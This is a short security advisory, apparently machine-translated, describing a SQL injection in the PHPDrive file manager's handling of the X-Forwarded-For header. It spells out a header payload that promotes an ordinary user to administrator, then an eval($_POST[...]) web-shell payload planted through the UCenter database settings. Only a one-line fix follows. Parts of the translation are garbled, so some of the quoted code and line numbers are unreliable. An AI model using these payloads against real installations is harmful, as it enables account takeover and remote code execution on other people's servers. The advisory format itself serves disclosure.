PHPDrive privilege elevation vulnerability and the Fix-vulnerability warning-the black bar safety net

2012-12-29T00:00:00
ID MYHACK58:62201236454
Type myhack58
Reporter 佚名
Modified 2012-12-29T00:00:00

Description

PHPDrive is set to run in the PHP environment file management system, can be applied to a network disk, enterprise document management, schools, team management, software, file, CMS, etc.

includes/user.lib.php Row 8 7 function get_ip() { if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];. In the user registration and login 处 module/disk/account.lead.php 1 9 8 row //Update the login IP and time $db->Query(‘UPDATE .$ db->TPre.’user SET before_last_date = ‘.$ UserArr['last_date'].’,last_date = ‘.$ NowUnixTime.’,before_last_ip = “‘.$ UserArr['last_ip'].’”,last_ip = “‘. get_ip().’” WHERE uid = ‘.$ UserArr['uid'].’;');// get_ip()into a library injected to produce Due to the program user and the manager is present in the same table, just use the group field to distinguish the two,group=1 for admin, 2 for normal user. So you can use the above injection, the ordinary user of the group value to 1, You can elevate permissions Method: using firefox a plug-in x-forwarded-for Header 1.0,will be your IP address changed to 1 2 3",group="1 then the landing, this time you are the administrator. Background getshell: In UCenter settings, the UC database login to fill in for the

root’);eval($_POST[DisKill]);?& gt;/* You can get a shell,the position in the data/uc.data.php

Fix: filtered injection